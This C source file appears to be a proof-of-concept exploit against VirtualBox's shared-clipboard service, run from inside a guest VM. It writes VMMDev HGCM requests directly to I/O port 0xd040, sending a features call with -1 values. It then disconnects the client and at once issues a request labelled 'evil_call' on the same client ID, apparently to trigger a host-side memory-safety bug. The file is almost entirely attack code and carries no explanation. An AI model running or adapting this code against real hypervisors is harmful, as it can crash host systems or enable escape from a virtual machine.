#include <sys/io.h>
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdarg.h>
#include "internal.h"

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

uint64_t virt2phys(void* p)
{
    uint64_t virt = (uint64_t)p;

    // Assert page alignment
    assert((virt & 0xfff) == 0);

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd == -1)
        die("open");

    uint64_t offset = (virt / 0x1000) * 8;
    lseek(fd, offset, SEEK_SET);

    uint64_t phys;
    if (read(fd, &phys, 8 ) != 8)
        die("read");
    close(fd);
    // Assert page present
    assert(phys & (1ULL << 63));

    phys = (phys & ((1ULL << 54) - 1)) * 0x1000;
    return phys;
}

#define VMMDEV_REQUEST_HEADER_VERSION (0x10001)


int main(){
	ioperm(0xd040,32,1);
	
	char* payload = (char*) mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	mlock(payload,0x1000);
	memset(payload,'A',0x1000);
	size_t phy_payload = virt2phys(payload);
	
	VMMDevHGCMConnect* conn =  (VMMDevHGCMConnect*) mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);	
	mlock(conn, 0x1000);

	VMMDevHGCMCall *call = (VMMDevHGCMCall*)mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	mlock(call, 0x1000);

	VMMDevHGCMDisconnect *disconn = (VMMDevHGCMDisconnect*)mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	mlock(disconn, 0x1000);

	VMMDevHGCMCall *evil_call = (VMMDevHGCMCall*)mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	mlock(evil_call,0x1000);

	conn->header.header.size = sizeof(*conn);
	conn->header.header.version = VMMDEV_REQUEST_HEADER_VERSION;
	conn->header.header.requestType = VMMDevReq_HGCMConnect;
	conn->loc.type = VMMDevHGCMLoc_LocalHost_Existing;
	strcpy(conn->loc.u.host.achName,"VBoxSharedClipboard");
	outl( virt2phys(conn) ,0xd040);
	
	while(!conn->u32ClientID) usleep(1000);

	

	{
		memset(call,0,0x1000);
		call->header.header.size = sizeof(*call) + sizeof(HGCMFunctionParameter64) * 2;
		call->header.header.version = VMMDEV_REQUEST_HEADER_VERSION;
		call->header.header.requestType = VMMDevReq_HGCMCall64;
		call->u32ClientID = conn->u32ClientID;
		call->u32Function = 6; //VBOX_SHCL_GUEST_FN_REPORT_FEATURES
		call->cParms = 2;
		
		HGCMFunctionParameter64 *aParms = (HGCMFunctionParameter64*) ( (void*)call+sizeof(*call));	

		aParms[0].type = VMMDevHGCMParmType_64bit;
		aParms[1].type = VMMDevHGCMParmType_64bit;

		aParms[0].value64= -1;
		aParms[0].value32= -1;
		aParms[1].value64= -1;
		aParms[1].value32= -1;

	}

	{
		memset(disconn,0,0x1000);
		disconn->header.header.size = sizeof(*disconn);
                disconn->header.header.version = VMMDEV_REQUEST_HEADER_VERSION;
                disconn->header.header.requestType = VMMDevReq_HGCMDisconnect;
                disconn->u32ClientID = conn->u32ClientID;
	}
	

	{
	
		evil_call->header.header.size = sizeof(*call) + sizeof(HGCMFunctionParameter64) * 1;
		evil_call->header.header.version = VMMDEV_REQUEST_HEADER_VERSION;
		evil_call->header.header.requestType = VMMDevReq_HGCMCall64;
		evil_call->u32ClientID = conn->u32ClientID;
		evil_call->u32Function = 2; //VBOX_SHCL_GUEST_FN_REPORT_FORMATS
		evil_call->cParms = 1;
		
		HGCMFunctionParameter64 *aParms = (HGCMFunctionParameter64*) ( (void*)evil_call+sizeof(*call));	

		aParms[0].type = VMMDevHGCMParmType_32bit;
		aParms[0].value32= -1;
	}


	outl( virt2phys(call) ,0xd040);
	outl( virt2phys(disconn) ,0xd040);
	outl( virt2phys(evil_call) ,0xd040);
	while(1) sleep(1);
	//printf("%p\n",&((VMMDevHGCMCall*)0)->aParms[0]);

}
